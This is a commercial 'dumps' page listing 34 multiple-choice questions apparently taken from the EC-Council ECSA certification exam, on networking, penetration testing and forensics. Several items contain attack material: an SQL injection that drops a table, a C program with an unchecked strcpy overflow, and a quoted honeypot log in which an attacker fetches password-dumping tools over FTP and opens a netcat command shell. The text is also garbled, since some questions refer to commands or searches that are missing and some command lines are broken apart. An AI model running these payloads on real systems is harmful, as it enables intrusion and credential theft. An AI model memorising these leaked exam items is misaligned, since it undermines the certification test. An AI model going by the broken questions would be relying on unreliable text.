Pre-Winter Special - Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: top65certs

ECCouncil 412-79 Dumps

Page: 1 / 9
Total 203 questions

EC-Council Certified Security Analyst (ECSA) Questions and Answers

Question 1

At what layer of the OSI model do routers function on?

Options:

A.

5

B.

1

C.

4

D.

3

Buy Now
Question 2

You setup SNMP in multiple offices of your company. Your SNMP software manager is not receiving data from other offices like it is for your main office. You suspect that firewall changes are to blame. What ports should you open for SNMP to work through Firewalls (Select 2)

Options:

A.

162

B.

160

C.

163

D.

161

Question 3

What will the following command produce on a website login page?What will the following command produce on a website? login page?

SELECT email, passwd, login_id, full_name

FROM members

WHERE email = 'someone@somehwere.com'; DROP TABLE members; --'

Options:

A.

This command will not produce anything since the syntax is incorrect

B.

Inserts the Error! Reference source not found. email address into the members table

C.

Retrieves the password for the first user in the members table

D.

Deletes the entire members table

Question 4

Kyle is performing the final testing of an application he developed for the accounting department. His last round of testing is to ensure that the program is as secure as possible. Kyle runs the following command. What is he testing at this point?

#include

#include

int main(int argc, char *argv[])

{

char buffer[10];

if (argc < 2)

{

fprintf(stderr, "USAGE: %s string\n", argv[0]);

return 1;

}

strcpy(buffer, argv[1]);

return 0;

}

Options:

A.

Buffer overflow

B.

Format string bug

C.

Kernal injection

D.

SQL injection

Question 5

When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?

Options:

A.

NIPS

B.

Passive IDS

C.

Progressive IDS

D.

Active IDS

Question 6

What are the security risks of running a "repair" installation for Windows XP?

Options:

A.

Pressing Shift+F10 gives the user administrative rights

B.

Pressing Ctrl+F10 gives the user administrative rights

C.

There are no security risks when running the "repair" installation for Windows XP

D.

Pressing Shift+F1 gives the user administrative rights

Question 7

Frank is working on a vulnerability assessment for a company on the West coast. The company hired Frank to assess its network security through scanning, pen tests, and vulnerability assessments. After discovering numerous known vulnerabilities detected by a temporary IDS he set up, he notices a number of items that show up as unknown but questionable in the logs. He looks up the behavior on the Internet, but cannot find anything related. What organization should Frank submit the log to find out if it is a new vulnerability or not?

Options:

A.

CVE

B.

IANA

C.

RIPE

D.

APIPA

Question 8

You are assigned to work in the computer forensics lab of a state police agency. While working on a high profile criminal case, you have followed every applicable procedure, however your boss is still concerned that the defense attorney might question weather evidence has been changed while at the laB. What can you do to prove that the evidence is the same as it was when it first entered the lab?

Options:

A.

make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab

B.

make an MD5 hash of the evidence and compare it to the standard database developed by NIST

C.

there is no reason to worry about this possible claim because state labs are certified

D.

sign a statement attesting that the evidence is the same as it was when it entered the lab

Question 9

You are called in to assist the police in an investigation involving a suspected drug dealer. The suspects house was searched by the police after a warrant was obtained and they located a floppy disk in the suspects bedroom. The disk contains several files, but they appear to be password protecteD. What are two common methods used by password cracking software that you can use to obtain the password?

Options:

A.

Limited force and library attack

B.

Brute Force and dictionary Attack

C.

Maximum force and thesaurus Attack

D.

Minimum force and appendix Attack

Question 10

What is the advantage in encrypting the communication between the agent and the monitor in an Intrusion Detection System?

Options:

A.

Encryption of agent communications will conceal the presence of the agents

B.

Alerts are sent to the monitor when a potential intrusion is detected

C.

An intruder could intercept and delete data or alerts and the intrusion can go undetected

D.

The monitor will know if counterfeit messages are being generated because they will not be encrypted

Question 11

In the context of file deletion process, which of the following statement holds true?

Options:

A.

When files are deleted, the data is overwritten and the cluster marked as available

B.

The longer a disk is inuse, the less likely it is that deleted files will be overwritten

C.

While booting, the machine may create temporary files that can delete evidence

D.

Secure delete programs work by completely overwriting the file in one go

Question 12

The following excerpt is taken from a honeypot log that was hosted at laB. wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD. EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

“cmd1.exe /c open 213.116.251.162 >ftpcom”

“cmd1.exe /c echo johna2k >>ftpcom”

“cmd1.exe /c echo

haxedj00 >>ftpcom”

“cmd1.exe /c echo get n

C.

exe >>ftpcom”

“cmd1.exe /c echo get pdump.exe >>ftpcom”

“cmd1.exe /c echo get samdump.dll >>ftpcom”

“cmd1.exe /c echo quit >>ftpcom”

“cmd1.exe /c ftp-

s:ftpcom”

“cmd1.exe /c nc

-l -p 6969 -

e cmd1.exe”

What can you infer from the exploit given?

Options:

A.

It is a local exploit where the attacker logs in using username johna2k

B.

There are two attackers on the system -johna2k and haxedj00

C.

The attack is a remote exploit and the hacker downloads three files

D.

The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Question 13

What type of attack occurs when an attacker can force a router to stop forwarding packets by flooding the router with many open connections simultaneously so that all the hosts behind the router are effectively disabled?

Options:

A.

digital attack

B.

denial of service

C.

physical attack

D.

ARP redirect

Question 14

A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker . Given below is an excerpt from a Snort binary capture of the attack. Decipher the activity carried out by the attacker by studying the log. Please note that you are required to infer only what is explicit in the excerpt. (Note: The student is being tested on concepts learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dump.) 03/15-20:21:24.107053 211.185.125.124:3500 -> 172.16.1.108:111 TCP TTL:43 TOS:0×0 ID:29726 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23678634 2878772 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

03/15-20:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111 UDP TTL:43 TOS:0×0 ID:29733 IpLen:20 DgmLen:84 Len: 64

01 0A 8A 0A 00 00 00 00 00 00 00 02 00 01 86 A0 ……………. 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ……………. 00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 …………….

00 00 00 11 00 00 00 00 ……..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

03/15-20:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773 UDP TTL:43 TOS:0×0 ID:29781 IpLen:20 DgmLen:1104 Len: 1084 47 F7 9F 63 00 00 00 00 00 00 00 02 00 01 86 B8

Options:

A.

The attacker has conducted a network sweep on port 111

B.

The attacker has scanned and exploited the system using Buffer Overflow

C.

The attacker has used a Trojan on port 32773

D.

The attacker has installed a backdoor

Question 15

Harold is a web designer who has completed a website for ghttech.net. As part of the maintenance agreement he signed with the client, Harold is performing research online and seeing how much exposure the site has received so far. Harold navigates to google.com and types in the following search.

What will this search produce?

Options:

A.

All sites that link to ghttech.net

B.

Sites that contain the code: link:www.ghttech.net

C.

All sites that ghttech.net links to

D.

All search engines that link to .net domains

Question 16

You work as an IT security auditor hired by a law firm in Boston to test whether you can gain access to sensitive information about the company clients. You have rummaged through their trash and found very little information. You do not want to set off any alarms on their network, so you plan on performing passive footprinting against their Web servers. What tool should you use?

Options:

A.

Nmap

B.

Netcraft

C.

Ping sweep

D.

Dig

Question 17

Your company's network just finished going through a SAS 70 audit. This audit reported that overall, your network is secure, but there are some areas that needs improvement. The major area was SNMP security. The audit company recommended turning off SNMP, but that is not an option since you have so many remote nodes to keep track of. What step could you take to help secure SNMP on your network?

Options:

A.

Change the default community string names

B.

Block all internal MAC address from using SNMP

C.

Block access to UDP port 171

D.

Block access to TCP port 171

Question 18

Larry is an IT consultant who works for corporations and government agencies. Larry plans on shutting down the city's network using BGP devices and ombies? What type of Penetration Testing is Larry planning to carry out?

Options:

A.

Internal Penetration Testing

B.

Firewall Penetration Testing

C.

DoS Penetration Testing

D.

Router Penetration Testing

Question 19

What is the following command trying to accomplish?

Options:

A.

Verify that TCP port 445 is open for the 192.168.0.0 network

B.

Verify that UDP port 445 is open for the 192.168.0.0 network

C.

Verify that UDP port 445 is closed for the 192.168.0.0 network

D.

Verify that NETBIOS is running for the 192.168.0.0 network

Question 20

Tyler is setting up a wireless network for his business that he runs out of his home. He has followed all the directions from the ISP as well as the wireless router manual. He does not have any encryption set and the SSID is being broadcast. On his laptop, he can pick up the wireless signal for short periods of time, but then the connection drops and the signal goes away. Eventually the wireless signal shows back up, but drops intermittently. What could be Tyler issue with his home wireless network?

Options:

A.

2.4 Ghz Cordless phones

B.

Satellite television

C.

CB radio

D.

Computers on his wired network

Question 21

An "idle" system is also referred to as what?

Options:

A.

PC not being used

B.

PC not connected to the Internet

C.

Bot

D.

Zombie

Question 22

Which Intrusion Detection System (IDS) usually produces the most false alarms due to the unpredictable behaviors of users and networks?

Options:

A.

network-based IDS systems (NIDS)

B.

host-based IDS systems (HIDS)

C.

anomaly detection

D.

signature recognition

Question 23

As a CHFI professional, which of the following is the most important to your professional reputation?

Options:

A.

Your Certifications

B.

The correct, successful management of each and every case

C.

The free that you charge

D.

The friendship of local law enforcement officers

Question 24

You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics laB. How many law-enforcement computer investigators should you request to staff the lab?

Options:

A.

8

B.

1

C.

4

D.

2

Question 25

When conducting computer forensic analysis, you must guard against ______________ So that you remain focused on the primary job and insure that the level of work does not increase beyond what was originally expecteD.

Options:

A.

Hard Drive Failure

B.

Scope Creep

C.

Unauthorized expenses

D.

Overzealous marketing

Question 26

If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation, what can you conclude?

Options:

A.

The system files have been copied by a remote attacker

B.

The system administrator has created an incremental backup

C.

The system has been compromised using a t0rnrootkit

D.

Nothing in particular as these can be operational files

Question 27

The rule of thumb when shutting down a system is to pull the power plug. However, it has certain drawbacks. Which of the following would that be?

Options:

A.

Any data not yet flushed to the system will be lost

B.

All running processes will be lost

C.

The /tmp directory will be flushed

D.

Power interruption will corrupt the pagefile

Question 28

You should make at least how many bit-stream copies of a suspect drive?

Options:

A.

1

B.

2

C.

3

D.

4

Question 29

You are employed directly by an attorney to help investigate an alleged sexual harassment case at a large pharmaceutical manufacture. While at the corporate office of the company, the CEO demands to know the status of the investigation. What prevents you from discussing the case with the CEO?

Options:

A.

the attorney-work-product rule

B.

Good manners

C.

Trade secrets

D.

ISO 17799

Question 30

An Expert witness give an opinion if:

Options:

A.

The Opinion, inferences or conclusions depend on special knowledge, skill or training not within the ordinary experience of lay jurors

B.

To define the issues of the case for determination by the finder of fact

C.

To stimulate discussion between the consulting expert and the expert witness

D.

To deter the witness form expanding the scope of his or her investigation beyond the requirements of the case

Question 31

When investigating a Windows System, it is important to view the contents of the page or swap file because:

Options:

A.

Windows stores all of the systems configuration information in this file

B.

This is file that windows use to communicate directly with Registry

C.

A Large volume of data can exist within the swap file of which the computer user has no knowledge

D.

This is the file that windows use to store the history of the last 100 commands that were run from the command line

Question 32

Which of the following refers to the data that might still exist in a cluster even though the original file has been overwritten by another file?

Options:

A.

Sector

B.

Metadata

C.

MFT

D.

Slack Space

Question 33

You are working in the security Department of law firm. One of the attorneys asks you about the topic of sending fake email because he has a client who has been charged with doing just that. His client alleges that he is innocent and that there is no way for a fake email to actually be sent. You inform the attorney that his client is mistaken and that fake email is possibility and that you can prove it. You return to your desk and craft a fake email to the attorney that appears to come from his boss. What port do you send the email to on the company SMTP server?

Options:

A.

10

B.

25

C.

110

D.

135

Question 34

During the course of a corporate investigation, you find that an Employee is committing a crime. Can the Employer file a criminal complain with Police?

Options:

A.

Yes, and all evidence can be turned over to the police

B.

Yes, but only if you turn the evidence over to a federal law enforcement agency

C.

No, because the investigation was conducted without following standard police procedures

D.

No, because the investigation was conducted without warrant

Page: 1 / 9
Total 203 questions